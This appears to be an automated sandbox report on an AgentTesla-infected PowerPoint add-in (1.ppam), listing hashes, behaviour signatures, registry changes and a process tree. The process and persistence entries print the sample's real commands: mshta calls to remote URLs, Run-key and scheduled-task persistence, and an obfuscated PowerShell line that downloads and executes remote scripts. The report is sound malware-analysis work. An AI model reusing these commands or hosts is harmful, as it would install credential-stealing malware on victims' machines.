Analysis
- max time kernel: 120s
- max time network: 140s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 18-10-2021 09:32
- Static task static1
- Behavioral task behavioral1: sample 1.ppam, resource win7-en-20211014
- Behavioral task behavioral2: sample 1.ppam, resource win10-en-20210920
General
- Target: 1.ppam
- Size: 11KB
- MD5: e5a35f8c565ddea415804d4b05244e28
- SHA1: 47d030e20b324c3706d652b2a562a61547e14fbd
- SHA256: 22da4275847d5be9f1d21df99c3f51be09d31be7942940732d311b030c62eeb0
- SHA512: 022d032f791e30e19a4c82a4e17cacaf238618c0f635bb94e747d7769093da575b2577fe95174d7b747b29909232d69df1a7135d9e3db640de947ce9dc21ffdf
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    mshta.exe (PID 5040), target process POWERPNT.EXE (PID 3464): Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process
- AgentTesla Payload (2 IoCs)
  Processes:
    behavioral2/memory/3776-324-0x00000000004376DE-mapping.dmp: yara rule family_agenttesla
    behavioral2/memory/3308-391-0x00000000004376DE-mapping.dmp: yara rule family_agenttesla
- Blocklisted process makes network request (15 IoCs)
  Processes:
    mshta.exe (PID 5040): flows 34, 37, 39, 42, 46, 47, 49, 52, 54, 57, 59, 60, 61, 63
    powershell.exe (PID 4992): flow 66
- Drops file in Drivers directory (2 IoCs)
  Processes:
    jsc.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
    RegAsm.exe: File opened for modification C:\Windows\system32\drivers\etc\hosts
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  Processes:
    RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    jsc.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- Adds Run key to start application (2 TTPs, 5 IoCs)
  Processes:
    mshta.exe: Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run
    mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""
    mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""
    mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\""
    mshta.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());"
- Suspicious use of SetThreadContext (2 IoCs)
  Processes:
    powershell.exe (PID 4992) set thread context of PID 3776 (jsc.exe)
    powershell.exe (PID 4992) set thread context of PID 3308 (RegAsm.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 5 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
    mshta.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    mshta.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
    POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
    POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
    POWERPNT.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    POWERPNT.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
- Kills process with taskkill (2 IoCs)
  Processes:
    taskkill.exe (PID 1508)
    taskkill.exe (PID 4184)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    POWERPNT.EXE (PID 3464)
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
    dw20.exe (PID 2224): 2 events
    powershell.exe (PID 4992): 3 events
    jsc.exe (PID 3776): 2 events
    RegAsm.exe (PID 3308): 2 events
- Suspicious behavior: SetClipboardViewer (1 IoC)
  Processes:
    RegAsm.exe (PID 3308)
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
    taskkill.exe (PID 1508): Token: SeDebugPrivilege
    taskkill.exe (PID 4184): Token: SeDebugPrivilege
    powershell.exe (PID 4992): Token: SeDebugPrivilege
    jsc.exe (PID 3776): Token: SeDebugPrivilege
    RegAsm.exe (PID 3308): Token: SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
    POWERPNT.EXE (PID 3464)
    mshta.exe (PID 5040)
    jsc.exe (PID 3776)
    RegAsm.exe (PID 3308)
- Suspicious use of WriteProcessMemory (32 IoCs)
  Processes:
    PID 3464 (POWERPNT.EXE) wrote to memory of 5040 (mshta.exe): 2 events
    PID 5040 (mshta.exe) wrote to memory of 1508 (taskkill.exe): 2 events
    PID 5040 (mshta.exe) wrote to memory of 4184 (taskkill.exe): 2 events
    PID 5040 (mshta.exe) wrote to memory of 4992 (powershell.exe): 2 events
    PID 5040 (mshta.exe) wrote to memory of 4132 (schtasks.exe): 2 events
    PID 5040 (mshta.exe) wrote to memory of 2224 (dw20.exe): 2 events
    PID 4992 (powershell.exe) wrote to memory of 3776 (jsc.exe): 8 events
    PID 4992 (powershell.exe) wrote to memory of 4548 (csc.exe): 2 events
    PID 4548 (csc.exe) wrote to memory of 2796 (cvtres.exe): 2 events
    PID 4992 (powershell.exe) wrote to memory of 3308 (RegAsm.exe): 8 events
- outlook_office_path (1 IoC)
  Processes:
    RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- outlook_win_path (1 IoC)
  Processes:
    RegAsm.exe: Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes (tree, depth in brackets)
- [1] C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\1.ppam" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksodksueasdweu
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/1.html\""
      - Creates scheduled task(s)
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
      - [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdline"
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF00.tmp" "c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMP"
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        - Drops file in Drivers directory
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: SetClipboardViewer
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - outlook_office_path
        - outlook_win_path
    - [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      Command line: dw20.exe -x -s 2696
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\RESF00.tmp
  MD5: f2a2d79cbf31e342efa391b1ce01baa2
  SHA1: d80642fbedcb6b1e8b5877c79575e31406795ec6
  SHA256: 95c9fd54100fc250f824e21b18645e6c84a0a643529b7742d817315645e9fbfa
  SHA512: 5943f701b07a8daf9798004ffe124bf514bfad00c678b5b7c124d2203f7228bf10ce9cd9ee9309f88b568f643b4c02665d58de5496e63506e6c3cd534a1fe6b4
- C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.dll
  MD5: 004a2a30c28121d4cc0a26952edde51d
  SHA1: 7b23b07ae09ae5f7625c33025e50a4f507d8383d
  SHA256: 05b757cb056ee8ba48b2f70ec08bca1c912b5816723faa977e14a49e7eaa69ff
  SHA512: d2773635fe8c42d016c4dbd178e305dc692e78e3487e73de56702bcb4e2489bf427f7a7775b9b68ef228706bbf4156636984b0f13aefa212459768869bdf0aff
- C:\Windows\system32\drivers\etc\hosts
  MD5: 5b2d17233558878a82ee464d04f58b59
  SHA1: 47ebffcad0b4c358df0d6a06ef335cb6aab0ab20
  SHA256: 5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
  SHA512: d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
- \??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMP
  MD5: d8c9afdbf35ccbf33eba86ef205f5bdb
  SHA1: 8bcac41ee1298bf9239fb9d8077709ad26558b37
  SHA256: e2ab03b4cd65ff8a75a34c1a84278c0bb185fa649ab0c990bfb14e182b3bd7f6
  SHA512: 80b1339a542ec3d77e6734fb0b4d7d9363235e98e42ecd3c4d619cf08ac3a57039ac653a3ec7dcd3b902cabe6ef9210a0eabd729776e2d99ec07ce72cd13f222
- \??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.0.cs
  MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
  SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
  SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
  SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
- \??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdline
  MD5: 536be0aaebd71dca2fed0e3abee76943
  SHA1: 54752089231ec3daf436e42538f28987e43a213b
  SHA256: d6d0af0e7cce2bfe40ca6e7ddd95413f9efa9c152861bf513e34a34f51cd69d8
  SHA512: 519b822398cb50b5b50041040dbc93d3488a1026c71dd4e9c6512faf71a85cfbe7f0771f55b383ef23a7d906b36783a79a8441cb106aaf7bdd4b952e4d382dac